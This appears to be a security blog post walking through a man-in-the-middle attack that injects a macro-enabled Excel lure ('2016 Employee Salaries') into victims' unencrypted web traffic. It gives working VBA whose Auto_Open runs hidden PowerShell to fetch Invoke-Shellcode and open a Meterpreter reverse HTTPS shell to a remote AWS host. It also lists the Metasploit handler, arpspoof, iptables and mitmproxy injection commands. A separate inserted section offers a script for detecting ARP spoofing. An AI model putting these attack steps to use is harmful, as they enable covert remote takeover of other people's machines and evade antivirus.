Malicious File Injection Technique

The idea with this particular attack is to inject a malicious file into the victim's packet stream when they visit a non-HTTPS web page.  For example, the default home page for Internet Explorer is http://www.msn.com. So, when the victim opens their web browser, we can (after a successful MiTM attack) inject our malicious file in the hope that they will run it.

Local LAN attack box: 172.17.130.53 (Kali Linux)
Local LAN victim: 172.17.130.75 (Windows 7 with IE 11, fully patched)
Public AWS server: 52.37.49.217
Internal AWS LAN IP: 172.31.18.189

Ideally, we want to remain undetected by AV, so we've embedded our malicious code in a macro-enabled Excel document.  If/when the victim opens the file and clicks to enable macros when prompted, a PowerShell command is executed that downloads Invoke-Shellcode (written by Matt Graeber) and runs it entirely in memory, so as to continue to remain undetected by AV.

First, we need to craft our malicious Excel document.  This is covered in a separate post, but the basic VBA code looks like this:

Private Sub Auto_Open()
    ' Download Invoke-Shellcode and run it in memory; the reverse HTTPS handler listens on the AWS box
    strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 52.37.49.217 -Lport 8443"
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)
End Sub

We also need a place to host our malicious file, which is seen below:

[screenshot]

Next, we set up our Metasploit listener, which is being done on an AWS box:

./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 8443; run"

[screenshot]

AWS NAT rules to forward incoming 8443 traffic:

[screenshot]

We now need to execute a MiTM attack on the victim. If we check the ARP table on our victim PC, we can see how it looks before ARP spoofing:

[screenshot]

After running the following three commands on our local attack box (substituting the real router and victim addresses), we'll have successfully implemented our MiTM attack:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t routerIP victimIP
arpspoof -i eth0 -t victimIP routerIP

Below is what we'll see on our local attack box:

[screenshot]

If we look again at the victim PC, we can see the change to the ARP tables:

[screenshot]
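The change visible in the victim's ARP table above is also what a defender can watch for. The following script is an added example (not part of the original post) that parses Windows `arp -a` output and flags the two signatures of this MiTM: the gateway's MAC address changing, and one MAC answering for more than one IP. The ARP listings, MAC addresses and the gateway address 172.17.130.1 are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample: a victim's ARP cache before and after ARP spoofing.
# MACs and the gateway 172.17.130.1 are made up; they are not from the post.
ARP_BEFORE = """\
Interface: 172.17.130.75 --- 0xb
  Internet Address      Physical Address      Type
  172.17.130.1          00-11-22-33-44-01     dynamic
  172.17.130.53         00-11-22-33-44-53     dynamic
  172.17.130.255        ff-ff-ff-ff-ff-ff     static
"""
ARP_AFTER = """\
Interface: 172.17.130.75 --- 0xb
  Internet Address      Physical Address      Type
  172.17.130.1          00-11-22-33-44-53     dynamic
  172.17.130.53         00-11-22-33-44-53     dynamic
  172.17.130.255        ff-ff-ff-ff-ff-ff     static
"""

# One 'arp -a' row: IPv4 address, dash-separated MAC, entry type
ENTRY = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)", re.I
)

def parse_arp(text):
    """Return {ip: mac} for the dynamic entries in Windows 'arp -a' output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table

def detect_spoof(before, after, gateway):
    """Flag ARP poisoning: gateway MAC changed, or one MAC now claims several IPs."""
    findings = []
    old, new = parse_arp(before), parse_arp(after)
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        findings.append(f"gateway {gateway} MAC changed {old[gateway]} -> {new[gateway]}")
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings

if __name__ == "__main__":
    for finding in detect_spoof(ARP_BEFORE, ARP_AFTER, "172.17.130.1"):
        print("ALERT:", finding)
```

On a real host the same check runs against two successive captures of `arp -a`; static ARP entries for the gateway, or switch-side dynamic ARP inspection, remove the condition this detection looks for.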

Once the MiTM attack is fully in place, we can now execute the following two commands on our local attack box to redirect all traffic on port 80 to port 8080:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

./mitmproxy -T -s "iframe_injector.py http://aws.shellgam3.com/files/2016%20Employee%20Salaries.xlsm"

The first argument runs mitmproxy in transparent proxy mode so that it handles the traffic redirected to port 8080.  The second argument runs a script that injects an iframe pointing at our macro-enabled Excel document, hosted on AWS, into the pages the victim's web browser loads.

[screenshot]

When the victim visits any non-HTTPS site (like MSN.com), they should see something similar within their browser:

[screenshot]

Within the mitmproxy console, we should see the injection:

[screenshot]

When the file is opened by the victim, we should (hopefully) have our reverse shell.  Even when the victim closes Excel, the shell should persist.

[screenshot]
